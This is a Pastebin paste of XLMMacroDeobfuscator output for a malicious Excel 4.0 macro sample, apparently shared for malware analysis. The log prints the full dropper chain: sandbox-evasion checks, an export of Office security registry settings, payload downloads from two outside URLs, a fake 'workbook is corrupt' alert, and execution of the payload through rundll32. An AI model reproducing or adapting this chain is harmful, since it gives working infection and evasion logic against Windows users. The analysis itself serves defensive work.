Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- _ _______
- |\ /|( \ ( )
- ( \ / )| ( | () () |
- \ (_) / | | | || || |
- ) _ ( | | | |(_)| |
- / ( ) \ | | | | | |
- ( / \ )| (____/\| ) ( |
- |/ \|(_______/|/ \|
- ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
- ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
- | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
- | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
- | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
- | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
- | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
- (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
- XLMMacroDeobfuscator(v 0.1.3) - https://github.com/DissectMalware/XLMMacroDeobfuscator
- File: C:\Users\user\Downloads\1c95961c6b8bb6ce087116dcb2452258cc0c7b8e38883e5dc46cf001b3685545
- [Loading Cells]
- auto_open: auto_open->ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!$FR$46752
- [Starting Deobfuscation]
- CELL:FR46752 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GM38479)
- CELL:FR46753 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AW47751)
- CELL:AW47751 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AH63704)
- CELL:AW47752 , FullEvaluation , GOTO(HD15139)
- CELL:HD15139 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BR18638)
- CELL:HD15140 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GR54551)
- CELL:GR54551 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HR28140)
- CELL:GR54552 , FullEvaluation , GOTO(FJ17553)
- CELL:FJ17553 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FW38376)
- CELL:FJ17554 , FullEvaluation , GOTO(AF3773)
- CELL:AF3773 , FullEvaluation , FORMULA("=CLOSE(FALSE)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EB49332)
- CELL:AF3774 , FullEvaluation , GOTO(CT18705)
- CELL:CT18705 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CT18706)
- CELL:CT18706 , NotImplemented , APP.MAXIMIZE()
- CELL:CT18707 , FullEvaluation , GOTO(AS19863)
- CELL:AS19863 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R[29468]C[87]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AS19864)
- CELL:AS19864 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R[29468]C[87]),)
- CELL:AS19865 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!R56527)
- CELL:R56527 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R[-7196]C[114]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!R56528)
- CELL:R56528 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R[-7196]C[114]))
- CELL:R56529 , FullEvaluation , GOTO(HK26600)
- CELL:HK26600 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R[22731]C[-87]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HK26601)
- CELL:HK26601 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R[22731]C[-87]),)
- CELL:HK26602 , FullEvaluation , GOTO(AJ7450)
- CELL:AJ7450 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R[41881]C[96]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AJ7451)
- CELL:AJ7451 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[41881]C[96]),)
- CELL:AJ7452 , FullEvaluation , GOTO(EK61293)
- CELL:EK61293 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R[-11962]C[-9]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EK61294)
- CELL:EK61294 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-11962]C[-9]),)
- CELL:EK61294 , FullEvaluation , [TRUE] GOTO(R[-11962]C[-9])
- CELL:EB49332 , End , CLOSE(FALSE)
- CELL:EK61294 , FullEvaluation , [FALSE]
- CELL:EK61295 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DZ2438)
- CELL:DZ2438 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R[46893]C[2]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DZ2439)
- CELL:DZ2439 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[46893]C[2]),)
- CELL:DZ2439 , FullEvaluation , [TRUE] GOTO(R[46893]C[2])
- CELL:EB49332 , End , CLOSE(FALSE)
- CELL:DZ2439 , FullEvaluation , [FALSE]
- CELL:DZ2440 , FullEvaluation , GOTO(X52802)
- CELL:X52802 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R[-3471]C[108]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!X52803)
- CELL:X52803 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-3471]C[108]))
- CELL:X52804 , FullEvaluation , GOTO(AH63311)
- CELL:AH63311 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R[-13980]C[98]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AH63312)
- CELL:AH63312 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-13980]C[98]))
- CELL:AH63313 , FullEvaluation , GOTO(GF60843)
- CELL:GF60843 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-11512]C[-56]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GF60844)
- CELL:GF60844 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-11512]C[-56]))
- CELL:GF60845 , FullEvaluation , GOTO(GI38395)
- CELL:GI38395 , FullEvaluation , FORMULA("=""EXPORT HKCU\Software\Microsoft\Office\""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EL27848)
- CELL:GI38396 , FullEvaluation , GOTO(DR63558)
- CELL:DR63558 , FullEvaluation , FORMULA("=""C:\Users\Public\wtc2ww4T.reg""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DM32005)
- CELL:DR63559 , FullEvaluation , GOTO(DG40898)
- CELL:DG40898 , FullEvaluation , FORMULA("=R[-11208]C[-107]&GET.WORKSPACE(2)&""\Excel\Security ""&R[-7051]C[-132]&"" /y""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IO39056)
- CELL:DG40899 , FullEvaluation , GOTO(HA24365)
- CELL:HA24365 , FullEvaluation , FORMULA("=""C:\Windows\system32\reg.exe""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AB40744)
- CELL:HA24366 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DE20488)
- CELL:DE20488 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[20255]C[-81],R[18567]C[140],0,5)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DE20489)
- CELL:DE20489 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe",GET.WORKSPACE(2)\Excel\Security /y,0,5)
- CELL:DE20490 , FullEvaluation , GOTO(AK37585)
- CELL:AK37585 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R[-5583]C[80])))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37588)
- CELL:AK37586 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37589)
- CELL:AK37587 , FullEvaluation , FORMULA("=NEXT()",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AK37590)
- CELL:AK37588 , PartialEvaluation , WHILE("C:\Users\Public\wtc2ww4T.reg")
- CELL:AK37589 , PartialEvaluation , WAIT("NOW()+""00:00:01""")
- CELL:AK37590 , PartialEvaluation , NEXT()
- CELL:AK37591 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CJ49023)
- CELL:CJ49023 , FullEvaluation , FORMULA("=FOPEN(R[-17019]C[29])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CJ49024)
- CELL:CJ49024 , PartialEvaluation , FOPEN("C:\Users\Public\wtc2ww4T.reg")
- CELL:CJ49025 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!B25789)
- CELL:B25789 , FullEvaluation , FORMULA("=FPOS(R[23234]C[86],215)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!B25790)
- CELL:B25790 , PartialEvaluation , FPOS("C:\Users\Public\wtc2ww4T.reg",215)
- CELL:B25791 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DI2879)
- CELL:DI2879 , FullEvaluation , FORMULA("=FREAD(R[46144]C[-25],255)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DI2880)
- CELL:DI2880 , PartialEvaluation , FREAD("C:\Users\Public\wtc2ww4T.reg",255)
- CELL:DI2881 , FullEvaluation , GOTO(J32571)
- CELL:J32571 , FullEvaluation , FORMULA("=FCLOSE(R[16452]C[78])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!J32572)
- CELL:J32572 , PartialEvaluation , FCLOSE("C:\Users\Public\wtc2ww4T.reg")
- CELL:J32573 , FullEvaluation , GOTO(HD11908)
- CELL:HD11908 , FullEvaluation , FORMULA("=FILE.DELETE(R[20096]C[-95])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HD11909)
- CELL:HD11909 , NotImplemented , FILE.DELETE(R[20096]C[-95])
- CELL:HD11910 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM17958)
- CELL:AM17958 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""0001"",R[-15079]C[74])),GOTO(R[31373]C[93]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM17959)
- CELL:AM17959 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-15079]C[74])),GOTO(R[31373]C[93]),)
- CELL:AM17960 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!A42769)
- CELL:A42769 , FullEvaluation , FORMULA("=""C:\Users\Public\v1grGU1.html""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!S26970)
- CELL:A42770 , FullEvaluation , GOTO(CK56936)
- CELL:CK56936 , FullEvaluation , FORMULA("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GN29930)
- CELL:CK56937 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GB25454)
- CELL:GB25454 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[4475]C[12],R[1515]C[-165],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GB25455)
- CELL:GB25455 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates","C:\Users\Public\v1grGU1.html",0,0)
- CELL:GB25456 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CB39286)
- CELL:CB39286 , FullEvaluation , FORMULA("=FILES(R[-12317]C[-61])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CB39287)
- CELL:CB39287 , PartialEvaluation , FILES("C:\Users\Public\v1grGU1.html")
- CELL:CB39288 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EX62675)
- CELL:EX62675 , FullEvaluation , FORMULA("=IF(ISERROR(R[-23389]C[-74]),GOTO(R[-13344]C[-22]),)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EX62676)
- CELL:EX62676 , FullBranching , IF(ISERROR(R[-23389]C[-74]),GOTO(R[-13344]C[-22]),)
- CELL:EX62676 , FullEvaluation , [TRUE] GOTO(R[-13344]C[-22])
- CELL:EB49332 , End , CLOSE(FALSE)
- CELL:EX62676 , FullEvaluation , [FALSE]
- CELL:EX62677 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!Z22543)
- CELL:Z22543 , FullEvaluation , FORMULA("klmnopqrstuvwxyz{|}",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AM38736)
- CELL:Z22544 , FullEvaluation , GOTO(HK9570)
- CELL:HK9570 , FullEvaluation , FORMULA("XYZ[\]^_`abcdefghij",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DH15310)
- CELL:HK9571 , FullEvaluation , GOTO(GX34325)
- CELL:GX34325 , FullEvaluation , FORMULA("EFGHIJKLMNOPQRSTUVW",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FA53097)
- CELL:GX34326 , FullEvaluation , GOTO(GB11054)
- CELL:GB11054 , FullEvaluation , FORMULA("23456789:;<=>?@ABCD",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AS6496)
- CELL:GB11055 , FullEvaluation , GOTO(HI50545)
- CELL:HI50545 , FullEvaluation , FORMULA(" !""#$%&'()*+,-./01",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!FB46246)
- CELL:HI50546 , FullEvaluation , GOTO(DJ57354)
- CELL:DJ57354 , FullEvaluation , FORMULA("=""C:\Users\Public\qaaGrR.html""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EN33297)
- CELL:DJ57355 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GH65453)
- CELL:GH65453 , FullEvaluation , FORMULA("=""http://9dani.com/wp-keys.php""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HJ48131)
- CELL:GH65454 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BA58221)
- CELL:BA58221 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[15348]C[172],R[514]C[98],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!AT32783)
- CELL:BA58222 , FullEvaluation , GOTO(BL32900)
- CELL:BL32900 , FullEvaluation , FORMULA("=FILES(R[30511]C[68])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BX2786)
- CELL:BL32901 , FullEvaluation , GOTO(I43306)
- CELL:I43306 , FullEvaluation , FORMULA("=IF(ISERROR(R[-17912]C[67]),,RUN(R[2015]C[221]))",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!I20698)
- CELL:I43307 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CS63959)
- CELL:CS63959 , FullEvaluation , FORMULA("=""https://scsanwei.cn/wp-keys.php""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BH52763)
- CELL:CS63960 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!GZ44453)
- CELL:GZ44453 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[17023]C[-64],R[-2443]C[20],0,0)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DT35740)
- CELL:GZ44454 , FullEvaluation , GOTO(BU55359)
- CELL:BU55359 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EC53342)
- CELL:BU55360 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!BG27079)
- CELL:BG27079 , FullEvaluation , FORMULA("=ALERT(R[30629]C[-97])",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
- CELL:BG27080 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!CX17523)
- CELL:CX17523 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
- CELL:CX17524 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!DQ59477)
- CELL:DQ59477 , FullEvaluation , FORMULA("=R[-23286]C[132]&"",DllRegisterServer""",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!L56583)
- CELL:DQ59478 , FullEvaluation , GOTO(EI28324)
- CELL:EI28324 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-1940]C[-243],R[53470]C[-239],0,5)",ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
- CELL:EI28325 , FullEvaluation , GOTO(AT32783)
- CELL:AT32783 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://9dani.com/wp-keys.php","C:\Users\Public\qaaGrR.html",0,0)
- CELL:AT32784 , FullEvaluation , GOTO(BX2786)
- CELL:BX2786 , PartialEvaluation , FILES("C:\Users\Public\qaaGrR.html")
- CELL:BX2787 , FullEvaluation , GOTO(I20698)
- CELL:I20698 , FullBranching , IF(ISERROR(R[-17912]C[67]),,RUN(R[2015]C[221]))
- CELL:I20698 , FullEvaluation , [TRUE]
- CELL:I20699 , FullEvaluation , GOTO(BH52763)
- CELL:BH52763 , FullEvaluation , "https://scsanwei.cn/wp-keys.php"
- CELL:BH52764 , FullEvaluation , GOTO(DT35740)
- CELL:DT35740 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://scsanwei.cn/wp-keys.php","C:\Users\Public\qaaGrR.html",0,0)
- CELL:DT35741 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!EC53342)
- CELL:EC53342 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
- CELL:EC53343 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
- CELL:HV22713 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:HV22714 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
- CELL:H1173 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:H1174 , FullEvaluation , GOTO(L56583)
- CELL:L56583 , FullEvaluation , C:\Users\Public\qaaGrR.html,DllRegisterServer
- CELL:L56584 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
- CELL:IQ3113 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\qaaGrR.html,DllRegisterServer",0,5)
- CELL:IQ3114 , FullEvaluation , GOTO(EB49332)
- CELL:EB49332 , End , CLOSE(FALSE)
- CELL:I20698 , FullEvaluation , [FALSE] RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!HV22713)
- CELL:HV22713 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
- CELL:HV22714 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!H1173)
- CELL:H1173 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
- CELL:H1174 , FullEvaluation , GOTO(L56583)
- CELL:L56583 , FullEvaluation , C:\Users\Public\qaaGrR.html,DllRegisterServer
- CELL:L56584 , FullEvaluation , RUN(ak4nQ5ZJKVtcRaVp2iOGwKWVPrignX!IQ3113)
- CELL:IQ3113 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\qaaGrR.html,DllRegisterServer",0,5)
- CELL:IQ3114 , FullEvaluation , GOTO(EB49332)
- CELL:EB49332 , End , CLOSE(FALSE)
- [END of Deobfuscation]
- time elapsed: 4.695186376571655
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement